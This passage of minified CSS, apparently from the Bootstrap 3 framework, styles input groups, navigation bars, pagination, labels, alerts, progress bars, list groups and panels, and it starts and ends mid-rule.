.dropdown-toggle, .input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle), .input-group-btn:last-child > .btn-group:not(:last-child) > .btn { border-bottom-right-radius: 0; border-top-right-radius: 0; } .input-group-addon:first-child { border-right: 0; } .input-group .form-control:last-child, .input-group-addon:last-child, .input-group-btn:last-child > .btn, .input-group-btn:last-child > .btn-group > .btn, .input-group-btn:last-child > .dropdown-toggle, .input-group-btn:first-child > .btn:not(:first-child), .input-group-btn:first-child > .btn-group:not(:first-child) > .btn { border-bottom-left-radius: 0; border-top-left-radius: 0; } .input-group-addon:last-child { border-left: 0; } .input-group-btn { position: relative; font-size: 0; white-space: nowrap; } .input-group-btn > .btn { position: relative; } .input-group-btn > .btn + .btn { margin-left: -1px; } .input-group-btn > .btn:hover, .input-group-btn > .btn:focus, .input-group-btn > .btn:active { z-index: 2; } .input-group-btn:first-child > .btn, .input-group-btn:first-child > .btn-group { margin-right: -1px; } .input-group-btn:last-child > .btn, .input-group-btn:last-child > .btn-group { margin-left: -1px; } .nav { margin-bottom: 0; padding-left: 0; list-style: none; } .nav > li { position: relative; display: block; } .nav > li > a { position: relative; display: block; padding: 10px 15px; } .nav > li > a:hover, .nav > li > a:focus { text-decoration: none; background-color: #eeeeee; } .nav > li.disabled > a { color: #999999; } .nav > li.disabled > a:hover, .nav > li.disabled > a:focus { color: #999999; text-decoration: none; background-color: transparent; cursor: not-allowed; } .nav .open > a, .nav .open > a:hover, .nav .open > a:focus { background-color: #eeeeee; border-color: #428bca; } .nav .nav-divider { height: 1px; margin: 9px 0; overflow: hidden; background-color: #e5e5e5; } .nav > li > a > img { max-width: none; } .nav-tabs { border-bottom: 1px solid #dddddd; } .nav-tabs > li { float: left; margin-bottom: -1px; } .nav-tabs > li > a { margin-right: 2px; line-height: 1.42857143; border: 1px solid transparent; border-radius: 4px 4px 0 0; } .nav-tabs > li > a:hover { border-color: #eeeeee #eeeeee #dddddd; } .nav-tabs > li.active > a, .nav-tabs > li.active > a:hover, .nav-tabs > li.active > a:focus { color: #555555; background-color: #ffffff; border: 1px solid #dddddd; border-bottom-color: transparent; cursor: default; } .nav-tabs.nav-justified { width: 100%; border-bottom: 0; } .nav-tabs.nav-justified > li { float: none; } .nav-tabs.nav-justified > li > a { text-align: center; margin-bottom: 5px; } .nav-tabs.nav-justified > .dropdown .dropdown-menu { top: auto; left: auto; } @media (min-width: 768px) { .nav-tabs.nav-justified > li { display: table-cell; width: 1%; } .nav-tabs.nav-justified > li > a { margin-bottom: 0; } } .nav-tabs.nav-justified > li > a { margin-right: 0; border-radius: 4px; } .nav-tabs.nav-justified > .active > a, .nav-tabs.nav-justified > .active > a:hover, .nav-tabs.nav-justified > .active > a:focus { border: 1px solid #dddddd; } @media (min-width: 768px) { .nav-tabs.nav-justified > li > a { border-bottom: 1px solid #dddddd; border-radius: 4px 4px 0 0; } .nav-tabs.nav-justified > .active > a, .nav-tabs.nav-justified > .active > a:hover, .nav-tabs.nav-justified > .active > a:focus { border-bottom-color: #ffffff; } } .nav-pills > li { float: left; } .nav-pills > li > a { border-radius: 4px; } .nav-pills > li + li { margin-left: 2px; } .nav-pills > li.active > a, .nav-pills > li.active > a:hover, .nav-pills > li.active > a:focus { color: #ffffff; background-color: #428bca; } .nav-stacked > li { float: none; } .nav-stacked > li + li { margin-top: 2px; margin-left: 0; } .nav-justified { width: 100%; } .nav-justified > li { float: none; } .nav-justified > li > a { text-align: center; margin-bottom: 5px; } .nav-justified > .dropdown .dropdown-menu { top: auto; left: auto; } @media (min-width: 768px) { .nav-justified > li { display: table-cell; width: 1%; } .nav-justified > li > a { margin-bottom: 0; } } .nav-tabs-justified { border-bottom: 0; } .nav-tabs-justified > li > a { margin-right: 0; border-radius: 4px; } .nav-tabs-justified > .active > a, .nav-tabs-justified > .active > a:hover, .nav-tabs-justified > .active > a:focus { border: 1px solid #dddddd; } @media (min-width: 768px) { .nav-tabs-justified > li > a { border-bottom: 1px solid #dddddd; border-radius: 4px 4px 0 0; } .nav-tabs-justified > .active > a, .nav-tabs-justified > .active > a:hover, .nav-tabs-justified > .active > a:focus { border-bottom-color: #ffffff; } } .tab-content > .tab-pane { display: none; } .tab-content > .active { display: block; } .nav-tabs .dropdown-menu { margin-top: -1px; border-top-right-radius: 0; border-top-left-radius: 0; } .navbar { position: relative; min-height: 50px; margin-bottom: 20px; border: 1px solid transparent; } @media (min-width: 768px) { .navbar { border-radius: 4px; } } @media (min-width: 768px) { .navbar-header { float: left; } } .navbar-collapse { max-height: 340px; overflow-x: visible; padding-right: 15px; padding-left: 15px; border-top: 1px solid transparent; box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1); -webkit-overflow-scrolling: touch; } .navbar-collapse.in { overflow-y: auto; } @media (min-width: 768px) { .navbar-collapse { width: auto; border-top: 0; box-shadow: none; } .navbar-collapse.collapse { display: block !important; height: auto !important; padding-bottom: 0; overflow: visible !important; } .navbar-collapse.in { overflow-y: visible; } .navbar-fixed-top .navbar-collapse, .navbar-static-top .navbar-collapse, .navbar-fixed-bottom .navbar-collapse { padding-left: 0; padding-right: 0; } } .container > .navbar-header, .container-fluid > .navbar-header, .container > .navbar-collapse, .container-fluid > .navbar-collapse { margin-right: -15px; margin-left: -15px; } @media (min-width: 768px) { .container > .navbar-header, .container-fluid > .navbar-header, .container > .navbar-collapse, .container-fluid > .navbar-collapse { margin-right: 0; margin-left: 0; } } .navbar-static-top { z-index: 1000; border-width: 0 0 1px; } @media (min-width: 768px) { .navbar-static-top { border-radius: 0; } } .navbar-fixed-top, .navbar-fixed-bottom { position: fixed; right: 0; left: 0; z-index: 1030; } @media (min-width: 768px) { .navbar-fixed-top, .navbar-fixed-bottom { border-radius: 0; } } .navbar-fixed-top { top: 0; border-width: 0 0 1px; } .navbar-fixed-bottom { bottom: 0; margin-bottom: 0; border-width: 1px 0 0; } .navbar-brand { float: left; padding: 15px 15px; font-size: 18px; line-height: 20px; height: 50px; } .navbar-brand:hover, .navbar-brand:focus { text-decoration: none; } @media (min-width: 768px) { .navbar > .container .navbar-brand, .navbar > .container-fluid .navbar-brand { margin-left: -15px; } } .navbar-toggle { position: relative; float: right; margin-right: 15px; padding: 9px 10px; margin-top: 8px; margin-bottom: 8px; background-color: transparent; background-image: none; border: 1px solid transparent; border-radius: 4px; } .navbar-toggle:focus { outline: none; } .navbar-toggle .icon-bar { display: block; width: 22px; height: 2px; border-radius: 1px; } .navbar-toggle .icon-bar + .icon-bar { margin-top: 4px; } @media (min-width: 768px) { .navbar-toggle { display: none; } } .navbar-nav { margin: 7.5px -15px; } .navbar-nav > li > a { padding-top: 10px; padding-bottom: 10px; line-height: 20px; } @media (max-width: 767px) { .navbar-nav .open .dropdown-menu { position: static; float: none; width: auto; margin-top: 0; background-color: transparent; border: 0; box-shadow: none; } .navbar-nav .open .dropdown-menu > li > a, .navbar-nav .open .dropdown-menu .dropdown-header { padding: 5px 15px 5px 25px; } .navbar-nav .open .dropdown-menu > li > a { line-height: 20px; } .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-nav .open .dropdown-menu > li > a:focus { background-image: none; } } @media (min-width: 768px) { .navbar-nav { float: left; margin: 0; } .navbar-nav > li { float: left; } .navbar-nav > li > a { padding-top: 15px; padding-bottom: 15px; } .navbar-nav.navbar-right:last-child { margin-right: -15px; } } @media (min-width: 768px) { .navbar-left { float: left !important; } .navbar-right { float: right !important; } } .navbar-form { margin-left: -15px; margin-right: -15px; padding: 10px 15px; border-top: 1px solid transparent; border-bottom: 1px solid transparent; -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1); box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1); margin-top: 8px; margin-bottom: 8px; } @media (min-width: 768px) { .navbar-form .form-group { display: inline-block; margin-bottom: 0; vertical-align: middle; } .navbar-form .form-control { display: inline-block; width: auto; vertical-align: middle; } .navbar-form .input-group > .form-control { width: 100%; } .navbar-form .control-label { margin-bottom: 0; vertical-align: middle; } .navbar-form .radio, .navbar-form .checkbox { display: inline-block; margin-top: 0; margin-bottom: 0; padding-left: 0; vertical-align: middle; } .navbar-form .radio input[type="radio"], .navbar-form .checkbox input[type="checkbox"] { float: none; margin-left: 0; } .navbar-form .has-feedback .form-control-feedback { top: 0; } } @media (max-width: 767px) { .navbar-form .form-group { margin-bottom: 5px; } } @media (min-width: 768px) { .navbar-form { width: auto; border: 0; margin-left: 0; margin-right: 0; padding-top: 0; padding-bottom: 0; -webkit-box-shadow: none; box-shadow: none; } .navbar-form.navbar-right:last-child { margin-right: -15px; } } .navbar-nav > li > .dropdown-menu { margin-top: 0; border-top-right-radius: 0; border-top-left-radius: 0; } .navbar-fixed-bottom .navbar-nav > li > .dropdown-menu { border-bottom-right-radius: 0; border-bottom-left-radius: 0; } .navbar-btn { margin-top: 8px; margin-bottom: 8px; } .navbar-btn.btn-sm { margin-top: 10px; margin-bottom: 10px; } .navbar-btn.btn-xs { margin-top: 14px; margin-bottom: 14px; } .navbar-text { margin-top: 15px; margin-bottom: 15px; } @media (min-width: 768px) { .navbar-text { float: left; margin-left: 15px; margin-right: 15px; } .navbar-text.navbar-right:last-child { margin-right: 0; } } .navbar-default { background-color: #f8f8f8; border-color: #e7e7e7; } .navbar-default .navbar-brand { color: #777777; } .navbar-default .navbar-brand:hover, .navbar-default .navbar-brand:focus { color: #5e5e5e; background-color: transparent; } .navbar-default .navbar-text { color: #777777; } .navbar-default .navbar-nav > li > a { color: #777777; } .navbar-default .navbar-nav > li > a:hover, .navbar-default .navbar-nav > li > a:focus { color: #333333; background-color: transparent; } .navbar-default .navbar-nav > .active > a, .navbar-default .navbar-nav > .active > a:hover, .navbar-default .navbar-nav > .active > a:focus { color: #555555; background-color: #e7e7e7; } .navbar-default .navbar-nav > .disabled > a, .navbar-default .navbar-nav > .disabled > a:hover, .navbar-default .navbar-nav > .disabled > a:focus { color: #cccccc; background-color: transparent; } .navbar-default .navbar-toggle { border-color: #dddddd; } .navbar-default .navbar-toggle:hover, .navbar-default .navbar-toggle:focus { background-color: #dddddd; } .navbar-default .navbar-toggle .icon-bar { background-color: #888888; } .navbar-default .navbar-collapse, .navbar-default .navbar-form { border-color: #e7e7e7; } .navbar-default .navbar-nav > .open > a, .navbar-default .navbar-nav > .open > a:hover, .navbar-default .navbar-nav > .open > a:focus { background-color: #e7e7e7; color: #555555; } @media (max-width: 767px) { .navbar-default .navbar-nav .open .dropdown-menu > li > a { color: #777777; } .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus { color: #333333; background-color: transparent; } .navbar-default .navbar-nav .open .dropdown-menu > .active > a, .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus { color: #555555; background-color: #e7e7e7; } .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a, .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover, .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus { color: #cccccc; background-color: transparent; } } .navbar-default .navbar-link { color: #777777; } .navbar-default .navbar-link:hover { color: #333333; } .navbar-inverse { background-color: #222222; border-color: #080808; } .navbar-inverse .navbar-brand { color: #999999; } .navbar-inverse .navbar-brand:hover, .navbar-inverse .navbar-brand:focus { color: #ffffff; background-color: transparent; } .navbar-inverse .navbar-text { color: #999999; } .navbar-inverse .navbar-nav > li > a { color: #999999; } .navbar-inverse .navbar-nav > li > a:hover, .navbar-inverse .navbar-nav > li > a:focus { color: #ffffff; background-color: transparent; } .navbar-inverse .navbar-nav > .active > a, .navbar-inverse .navbar-nav > .active > a:hover, .navbar-inverse .navbar-nav > .active > a:focus { color: #ffffff; background-color: #080808; } .navbar-inverse .navbar-nav > .disabled > a, .navbar-inverse .navbar-nav > .disabled > a:hover, .navbar-inverse .navbar-nav > .disabled > a:focus { color: #444444; background-color: transparent; } .navbar-inverse .navbar-toggle { border-color: #333333; } .navbar-inverse .navbar-toggle:hover, .navbar-inverse .navbar-toggle:focus { background-color: #333333; } .navbar-inverse .navbar-toggle .icon-bar { background-color: #ffffff; } .navbar-inverse .navbar-collapse, .navbar-inverse .navbar-form { border-color: #101010; } .navbar-inverse .navbar-nav > .open > a, .navbar-inverse .navbar-nav > .open > a:hover, .navbar-inverse .navbar-nav > .open > a:focus { background-color: #080808; color: #ffffff; } @media (max-width: 767px) { .navbar-inverse .navbar-nav .open .dropdown-menu > .dropdown-header { border-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu .divider { background-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu > li > a { color: #999999; } .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > li > a:focus { color: #ffffff; background-color: transparent; } .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a, .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > .active > a:focus { color: #ffffff; background-color: #080808; } .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a, .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:hover, .navbar-inverse .navbar-nav .open .dropdown-menu > .disabled > a:focus { color: #444444; background-color: transparent; } } .navbar-inverse .navbar-link { color: #999999; } .navbar-inverse .navbar-link:hover { color: #ffffff; } .breadcrumb { padding: 8px 15px; margin-bottom: 20px; list-style: none; background-color: #f5f5f5; border-radius: 4px; } .breadcrumb > li { display: inline-block; } .breadcrumb > li + li:before { content: "/\00a0"; padding: 0 5px; color: #cccccc; } .breadcrumb > .active { color: #999999; } .pagination { display: inline-block; padding-left: 0; margin: 20px 0; border-radius: 4px; } .pagination > li { display: inline; } .pagination > li > a, .pagination > li > span { position: relative; float: left; padding: 6px 12px; line-height: 1.42857143; text-decoration: none; color: #428bca; background-color: #ffffff; border: 1px solid #dddddd; margin-left: -1px; } .pagination > li:first-child > a, .pagination > li:first-child > span { margin-left: 0; border-bottom-left-radius: 4px; border-top-left-radius: 4px; } .pagination > li:last-child > a, .pagination > li:last-child > span { border-bottom-right-radius: 4px; border-top-right-radius: 4px; } .pagination > li > a:hover, .pagination > li > span:hover, .pagination > li > a:focus, .pagination > li > span:focus { color: #2a6496; background-color: #eeeeee; border-color: #dddddd; } .pagination > .active > a, .pagination > .active > span, .pagination > .active > a:hover, .pagination > .active > span:hover, .pagination > .active > a:focus, .pagination > .active > span:focus { z-index: 2; color: #ffffff; background-color: #428bca; border-color: #428bca; cursor: default; } .pagination > .disabled > span, .pagination > .disabled > span:hover, .pagination > .disabled > span:focus, .pagination > .disabled > a, .pagination > .disabled > a:hover, .pagination > .disabled > a:focus { color: #999999; background-color: #ffffff; border-color: #dddddd; cursor: not-allowed; } .pagination-lg > li > a, .pagination-lg > li > span { padding: 10px 16px; font-size: 18px; } .pagination-lg > li:first-child > a, .pagination-lg > li:first-child > span { border-bottom-left-radius: 6px; border-top-left-radius: 6px; } .pagination-lg > li:last-child > a, .pagination-lg > li:last-child > span { border-bottom-right-radius: 6px; border-top-right-radius: 6px; } .pagination-sm > li > a, .pagination-sm > li > span { padding: 5px 10px; font-size: 12px; } .pagination-sm > li:first-child > a, .pagination-sm > li:first-child > span { border-bottom-left-radius: 3px; border-top-left-radius: 3px; } .pagination-sm > li:last-child > a, .pagination-sm > li:last-child > span { border-bottom-right-radius: 3px; border-top-right-radius: 3px; } .pager { padding-left: 0; margin: 20px 0; list-style: none; text-align: center; } .pager li { display: inline; } .pager li > a, .pager li > span { display: inline-block; padding: 5px 14px; background-color: #ffffff; border: 1px solid #dddddd; border-radius: 15px; } .pager li > a:hover, .pager li > a:focus { text-decoration: none; background-color: #eeeeee; } .pager .next > a, .pager .next > span { float: right; } .pager .previous > a, .pager .previous > span { float: left; } .pager .disabled > a, .pager .disabled > a:hover, .pager .disabled > a:focus, .pager .disabled > span { color: #999999; background-color: #ffffff; cursor: not-allowed; } .label { display: inline; padding: .2em .6em .3em; font-size: 75%; font-weight: bold; line-height: 1; color: #ffffff; text-align: center; white-space: nowrap; vertical-align: baseline; border-radius: .25em; } .label[href]:hover, .label[href]:focus { color: #ffffff; text-decoration: none; cursor: pointer; } .label:empty { display: none; } .btn .label { position: relative; top: -1px; } .label-default { background-color: #999999; } .label-default[href]:hover, .label-default[href]:focus { background-color: #808080; } .label-primary { background-color: #428bca; } .label-primary[href]:hover, .label-primary[href]:focus { background-color: #3071a9; } .label-success { background-color: #5cb85c; } .label-success[href]:hover, .label-success[href]:focus { background-color: #449d44; } .label-info { background-color: #5bc0de; } .label-info[href]:hover, .label-info[href]:focus { background-color: #31b0d5; } .label-warning { background-color: #f0ad4e; } .label-warning[href]:hover, .label-warning[href]:focus { background-color: #ec971f; } .label-danger { background-color: #d9534f; } .label-danger[href]:hover, .label-danger[href]:focus { background-color: #c9302c; } .badge { display: inline-block; min-width: 10px; padding: 3px 7px; font-size: 12px; font-weight: bold; color: #ffffff; line-height: 1; vertical-align: baseline; white-space: nowrap; text-align: center; background-color: #999999; border-radius: 10px; } .badge:empty { display: none; } .btn .badge { position: relative; top: -1px; } .btn-xs .badge { top: 0; padding: 1px 5px; } a.badge:hover, a.badge:focus { color: #ffffff; text-decoration: none; cursor: pointer; } a.list-group-item.active > .badge, .nav-pills > .active > a > .badge { color: #428bca; background-color: #ffffff; } .nav-pills > li > a > .badge { margin-left: 3px; } .jumbotron { padding: 30px; margin-bottom: 30px; color: inherit; background-color: #eeeeee; } .jumbotron h1, .jumbotron .h1 { color: inherit; } .jumbotron p { margin-bottom: 15px; font-size: 21px; font-weight: 200; } .container .jumbotron { border-radius: 6px; } .jumbotron .container { max-width: 100%; } @media screen and (min-width: 768px) { .jumbotron { padding-top: 48px; padding-bottom: 48px; } .container .jumbotron { padding-left: 60px; padding-right: 60px; } .jumbotron h1, .jumbotron .h1 { font-size: 63px; } } .thumbnail { display: block; padding: 4px; margin-bottom: 20px; line-height: 1.42857143; background-color: #ffffff; border: 1px solid #dddddd; border-radius: 4px; -webkit-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } .thumbnail > img, .thumbnail a > img { margin-left: auto; margin-right: auto; } a.thumbnail:hover, a.thumbnail:focus, a.thumbnail.active { border-color: #428bca; } .thumbnail .caption { padding: 9px; color: #333333; } .alert { padding: 15px; margin-bottom: 20px; border: 1px solid transparent; border-radius: 4px; } .alert h4 { margin-top: 0; color: inherit; } .alert .alert-link { font-weight: bold; } .alert > p, .alert > ul { margin-bottom: 0; } .alert > p + p { margin-top: 5px; } .alert-dismissable { padding-right: 35px; } .alert-dismissable .close { position: relative; top: -2px; right: -21px; color: inherit; } .alert-success { background-color: #dff0d8; border-color: #d6e9c6; color: #3c763d; } .alert-success hr { border-top-color: #c9e2b3; } .alert-success .alert-link { color: #2b542c; } .alert-info { background-color: #d9edf7; border-color: #bce8f1; color: #31708f; } .alert-info hr { border-top-color: #a6e1ec; } .alert-info .alert-link { color: #245269; } .alert-warning { background-color: #fcf8e3; border-color: #faebcc; color: #8a6d3b; } .alert-warning hr { border-top-color: #f7e1b5; } .alert-warning .alert-link { color: #66512c; } .alert-danger { background-color: #f2dede; border-color: #ebccd1; color: #a94442; } .alert-danger hr { border-top-color: #e4b9c0; } .alert-danger .alert-link { color: #843534; } @-webkit-keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } @keyframes progress-bar-stripes { from { background-position: 40px 0; } to { background-position: 0 0; } } .progress { overflow: hidden; height: 20px; margin-bottom: 20px; background-color: #f5f5f5; border-radius: 4px; -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1); } .progress-bar { float: left; width: 0%; height: 100%; font-size: 12px; line-height: 20px; color: #ffffff; text-align: center; background-color: #428bca; -webkit-box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15); box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.15); -webkit-transition: width 0.6s ease; transition: width 0.6s ease; } .progress-striped .progress-bar { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-size: 40px 40px; } .progress.active .progress-bar { -webkit-animation: progress-bar-stripes 2s linear infinite; animation: progress-bar-stripes 2s linear infinite; } .progress-bar-success { background-color: #5cb85c; } .progress-striped .progress-bar-success { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .progress-bar-info { background-color: #5bc0de; } .progress-striped .progress-bar-info { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .progress-bar-warning { background-color: #f0ad4e; } .progress-striped .progress-bar-warning { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .progress-bar-danger { background-color: #d9534f; } .progress-striped .progress-bar-danger { background-image: -webkit-linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent); } .media, .media-body { overflow: hidden; zoom: 1; } .media, .media .media { margin-top: 15px; } .media:first-child { margin-top: 0; } .media-object { display: block; } .media-heading { margin: 0 0 5px; } .media > .pull-left { margin-right: 10px; } .media > .pull-right { margin-left: 10px; } .media-list { padding-left: 0; list-style: none; } .list-group { margin-bottom: 20px; padding-left: 0; } .list-group-item { position: relative; display: block; padding: 10px 15px; margin-bottom: -1px; background-color: #ffffff; border: 1px solid #dddddd; } .list-group-item:first-child { border-top-right-radius: 4px; border-top-left-radius: 4px; } .list-group-item:last-child { margin-bottom: 0; border-bottom-right-radius: 4px; border-bottom-left-radius: 4px; } .list-group-item > .badge { float: right; } .list-group-item > .badge + .badge { margin-right: 5px; } a.list-group-item { color: #555555; } a.list-group-item .list-group-item-heading { color: #333333; } a.list-group-item:hover, a.list-group-item:focus { text-decoration: none; background-color: #f5f5f5; } a.list-group-item.active, a.list-group-item.active:hover, a.list-group-item.active:focus { z-index: 2; color: #ffffff; background-color: #428bca; border-color: #428bca; } a.list-group-item.active .list-group-item-heading, a.list-group-item.active:hover .list-group-item-heading, a.list-group-item.active:focus .list-group-item-heading { color: inherit; } a.list-group-item.active .list-group-item-text, a.list-group-item.active:hover .list-group-item-text, a.list-group-item.active:focus .list-group-item-text { color: #e1edf7; } .list-group-item-success { color: #3c763d; background-color: #dff0d8; } a.list-group-item-success { color: #3c763d; } a.list-group-item-success .list-group-item-heading { color: inherit; } a.list-group-item-success:hover, a.list-group-item-success:focus { color: #3c763d; background-color: #d0e9c6; } a.list-group-item-success.active, a.list-group-item-success.active:hover, a.list-group-item-success.active:focus { color: #fff; background-color: #3c763d; border-color: #3c763d; } .list-group-item-info { color: #31708f; background-color: #d9edf7; } a.list-group-item-info { color: #31708f; } a.list-group-item-info .list-group-item-heading { color: inherit; } a.list-group-item-info:hover, a.list-group-item-info:focus { color: #31708f; background-color: #c4e3f3; } a.list-group-item-info.active, a.list-group-item-info.active:hover, a.list-group-item-info.active:focus { color: #fff; background-color: #31708f; border-color: #31708f; } .list-group-item-warning { color: #8a6d3b; background-color: #fcf8e3; } a.list-group-item-warning { color: #8a6d3b; } a.list-group-item-warning .list-group-item-heading { color: inherit; } a.list-group-item-warning:hover, a.list-group-item-warning:focus { color: #8a6d3b; background-color: #faf2cc; } a.list-group-item-warning.active, a.list-group-item-warning.active:hover, a.list-group-item-warning.active:focus { color: #fff; background-color: #8a6d3b; border-color: #8a6d3b; } .list-group-item-danger { color: #a94442; background-color: #f2dede; } a.list-group-item-danger { color: #a94442; } a.list-group-item-danger .list-group-item-heading { color: inherit; } a.list-group-item-danger:hover, a.list-group-item-danger:focus { color: #a94442; background-color: #ebcccc; } a.list-group-item-danger.active, a.list-group-item-danger.active:hover, a.list-group-item-danger.active:focus { color: #fff; background-color: #a94442; border-color: #a94442; } .list-group-item-heading { margin-top: 0; margin-bottom: 5px; } .list-group-item-text { margin-bottom: 0; line-height: 1.3; } .panel { margin-bottom: 20px; background-color: #ffffff; border: 1px solid transparent; border-radius: 4px; -webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); box-shadow: 0 1px 1px rgba(0, 0, 0, 0.05); } .panel-body { padding: 15px; } .panel-heading { padding: 10px 15px; border-bottom: 1px solid transparent; border-top-right-radius: 3px; border-top-left-radius: 3px; } .panel-heading > .dropdown .dropdown-toggle { color: inherit; } .panel-title { margin-top: 0; margin-bottom: 0; font-size: 16px; color: inherit; } .panel-title > a { color: inherit; } .panel-footer { padding: 10px 15px; background-color: #f5f5f5; border-top: 1px solid #dddddd; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel > .list-group { margin-bottom: 0; } .panel > .list-group .list-group-item { border-width: 1px 0; border-radius: 0; } .panel > .list-group:first-child .list-group-item:first-child { border-top: 0; border-top-right-radius: 3px; border-top-left-radius: 3px; } .panel > .list-group:last-child .list-group-item:last-child { border-bottom: 0; border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel-heading + .list-group .list-group-item:first-child { border-top-width: 0; } .panel > .table, .panel > .table-responsive > .table { margin-bottom: 0; } .panel > .table:first-child, .panel > .table-responsive:first-child > .table:first-child { border-top-right-radius: 3px; border-top-left-radius: 3px; } .panel > .table:first-child > thead:first-child > tr:first-child td:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child td:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:first-child, .panel > .table:first-child > thead:first-child > tr:first-child th:first-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:first-child, .panel > .table:first-child > tbody:first-child > tr:first-child th:first-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:first-child { border-top-left-radius: 3px; } .panel > .table:first-child > thead:first-child > tr:first-child td:last-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child td:last-child, .panel > .table:first-child > tbody:first-child > tr:first-child td:last-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child td:last-child, .panel > .table:first-child > thead:first-child > tr:first-child th:last-child, .panel > .table-responsive:first-child > .table:first-child > thead:first-child > tr:first-child th:last-child, .panel > .table:first-child > tbody:first-child > tr:first-child th:last-child, .panel > .table-responsive:first-child > .table:first-child > tbody:first-child > tr:first-child th:last-child { border-top-right-radius: 3px; } .panel > .table:last-child, .panel > .table-responsive:last-child > .table:last-child { border-bottom-right-radius: 3px; border-bottom-left-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child td:first-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:first-child, .panel > .table:last-child > tfoot:last-child > tr:last-child td:first-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:first-child, .panel > .table:last-child > tbody:last-child > tr:last-child th:first-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:first-child, .panel > .table:last-child > tfoot:last-child > tr:last-child th:first-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:first-child { border-bottom-left-radius: 3px; } .panel > .table:last-child > tbody:last-child > tr:last-child td:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child td:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child td:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child td:last-child, .panel > .table:last-child > tbody:last-child > tr:last-child th:last-child, .panel > .table-responsive:last-child > .table:last-child > tbody:last-child > tr:last-child th:last-child, .panel > .table:last-child > tfoot:last-child > tr:last-child th:last-child, .panel > .table-responsive:last-child > .table:last-child > tfoot:last-child > tr:last-child th:last-child { border-bottom-right-radius: 3px; } .panel > .panel-body + .table, .panel > .panel-body + .table-responsive { border-top: 1px solid #dddddd; } .panel > .table > tbody:first-child > tr:first-child th, .panel > .table > tbody:first-child > tr:first-child td { border-top: 0; 